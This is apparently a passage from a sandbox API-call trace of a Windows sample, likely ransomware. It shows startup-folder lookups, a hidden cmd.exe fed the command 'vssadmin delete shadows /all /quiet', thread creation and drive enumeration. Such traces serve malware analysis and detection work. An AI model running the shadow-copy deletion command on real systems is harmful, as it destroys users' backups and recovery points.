[0031.929] lstrlenW (lpString="kernel32.dll") returned 12 [0031.929] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd50 | out: hHeap=0xb10000) returned 1 [0031.929] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.929] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6d0e8 | out: hHeap=0xb10000) returned 1 [0031.929] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2730020 | out: hHeap=0xb10000) returned 1 [0031.933] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb93b90 | out: hHeap=0xb10000) returned 1 [0031.934] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba3b98 | out: hHeap=0xb10000) returned 1 [0031.935] lstrlenW (lpString="%windir%\\System32") returned 17 [0031.935] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb7d190 | out: hHeap=0xb10000) returned 1 [0031.935] lstrlenW (lpString="%appdata%") returned 9 [0031.935] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cda0 | out: hHeap=0xb10000) returned 1 [0031.935] lstrlenW (lpString="%sh(Startup)%") returned 13 [0031.935] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd78 | out: hHeap=0xb10000) returned 1 [0031.935] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0031.935] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb7d148 | out: hHeap=0xb10000) returned 1 [0031.935] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.935] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6cd78 [0031.935] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd78, Size=0x40) returned 0xb7d148 [0031.935] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d148, Size=0x80) returned 0xbd3bc8 [0031.935] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.935] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6cd78 [0031.935] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1fffc) returned 0xb93b90 [0031.935] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbb3b98 [0031.935] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbc3ba0 [0031.935] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0031.935] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb6cda0 [0031.935] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cda0, Size=0x40) returned 0xb7d148 [0031.935] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d148, Size=0x80) returned 0xbd3c50 [0031.935] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd3c50, Size=0x100) returned 0xb90490 [0031.935] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.935] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90490 | out: hHeap=0xb10000) returned 1 [0031.935] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0xbb3b98, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0031.935] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc3ba0 | out: hHeap=0xb10000) returned 1 [0031.935] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbb3b98 | out: hHeap=0xb10000) returned 1 [0031.936] CreatePipe (in: hReadPipe=0x18fcc4, hWritePipe=0x18fcc8, lpPipeAttributes=0x18fcb4, nSize=0x0 | out: hReadPipe=0x18fcc4*=0xe8, hWritePipe=0x18fcc8*=0xec) returned 1 [0031.936] CreatePipe (in: hReadPipe=0x18fd34, hWritePipe=0x18fd38, lpPipeAttributes=0x18fcb4, nSize=0x0 | out: hReadPipe=0x18fd34*=0xf0, hWritePipe=0x18fd38*=0xf4) returned 1 [0031.936] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0031.936] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0031.936] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fcd4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fd24 | out: lpCommandLine=0x0, lpProcessInformation=0x18fd24*(hProcess=0xfc, hThread=0xf8, dwProcessId=0x968, dwThreadId=0x96c)) returned 1 [0031.953] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0031.953] WriteFile (in: hFile=0xec, lpBuffer=0xbd3bc8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fcd0, lpOverlapped=0x0 | out: lpBuffer=0xbd3bc8*, lpNumberOfBytesWritten=0x18fcd0*=0x41, lpOverlapped=0x0) returned 1 [0031.953] CloseHandle (hObject=0xfc) returned 1 [0031.953] CloseHandle (hObject=0xf8) returned 1 [0031.953] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb93b90 | out: hHeap=0xb10000) returned 1 [0031.953] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0031.953] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbd3bc8 | out: hHeap=0xb10000) returned 1 [0031.953] lstrlenW (lpString="%comspec%") returned 9 [0031.953] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb6cd78 | out: hHeap=0xb10000) returned 1 [0031.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0031.954] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e2b8 [0031.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0xb8e2b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0031.954] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb6c7d0 [0031.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0xb6c7d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2d0 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2d0, Size=0x20) returned 0xb6cd78 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd78, Size=0x40) returned 0xb7d148 [0031.955] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xd0) returned 0xb90508 [0031.955] GetLogicalDrives () returned 0x4 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10014) returned 0xb93b90 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2d0 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2d0, Size=0x20) returned 0xb6cd78 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6cd78, Size=0x40) returned 0xb7d2f8 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb7d2f8, Size=0x80) returned 0xbd3bc8 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xbd3bc8, Size=0x100) returned 0xb91920 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb91920, Size=0x200) returned 0xb91920 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb91920, Size=0x400) returned 0xb91920 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb91920, Size=0x800) returned 0xb91f38 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb91f38, Size=0x1000) returned 0xbd5bb0 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0xba3bb0 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2d0 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e3a8 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb6c778 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb8e3c0 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x4) returned 0xb6c788 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e3d8 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c788, Size=0x8) returned 0xb6c788 [0031.955] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e3f0 [0031.955] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c788, Size=0x10) returned 0xb6c740 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e408 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e420 [0031.956] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb6c740, Size=0x20) returned 0xb8fc50 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e438 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb6c788 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xb8e450 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xb8e468 [0031.956] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8fc50, Size=0x40) returned 0xb905e0 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xb8e480 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xb8e498 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xb8e4b0 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xb8e4c8 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e4e0 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e4f8 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb6c740 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb8e510 [0031.956] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb905e0, Size=0x80) returned 0xb91920 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb91f50 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb91f68 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb91f80 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb91f98 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb91fb0 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb91fc8 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb91fe0 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb6c750 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb91ff8 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92010 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92028 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92040 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92058 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92070 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92088 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb920a0 [0031.956] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb91920, Size=0x100) returned 0xb91920 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb920b8 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb920d0 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb920e8 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb92100 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92118 [0031.956] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92130 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb8fc50 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92148 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92160 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92178 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xb8fc60 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92190 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb921a8 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb8fc70 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb921c0 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb921d8 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb921f0 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92208 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92220 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92238 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xb92250 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92268 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb92280 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92298 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb922b0 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb922c8 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb922e0 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb8fc80 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb922f8 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92310 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92350 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92368 [0031.957] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb91920, Size=0x200) returned 0xb91920 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92380 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb8ea90 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92398 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb923b0 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb923c8 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb923e0 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb923f8 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92410 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92428 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92440 [0031.957] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92458 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92470 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92488 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb924a0 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb924b8 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb924d0 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb924e8 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92500 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92518 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92530 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92548 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92560 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92578 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb8eaa0 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92590 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb925a8 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb925c0 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb92750 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb925d8 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb925f0 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92608 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92620 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92638 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92650 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92668 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb92680 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92698 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb926b0 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb926c8 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb926e0 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xb926f8 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xb92710 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6bd0 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6be8 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6c00 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6c18 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6c30 [0031.958] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6c48 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6c60 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb92760 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xb92770 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6c78 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6c90 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6ca8 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6cc0 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6cd8 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd6cf0 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6d08 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6d20 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6d38 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6d50 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd6d68 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6d80 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6d98 [0031.959] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb91920, Size=0x400) returned 0xb91920 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6db0 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6dc8 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd6de0 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6df8 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6e10 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6e28 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd6e40 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6e58 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6e70 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6e88 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb92780 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6ea0 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xc) returned 0xbd6eb8 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6ed0 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6ee8 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6f00 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6f18 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xbd6f30 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6f48 [0031.959] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6f60 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6f78 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6f90 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6fd0 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd6fe8 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7000 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7018 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x8) returned 0xb92790 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7030 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7048 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7060 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7078 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7090 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd70a8 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd70c0 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd70d8 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd70f0 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xbd7108 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7120 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xe) returned 0xbd7138 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7150 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7168 [0031.960] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xa) returned 0xbd7180 [0031.960] 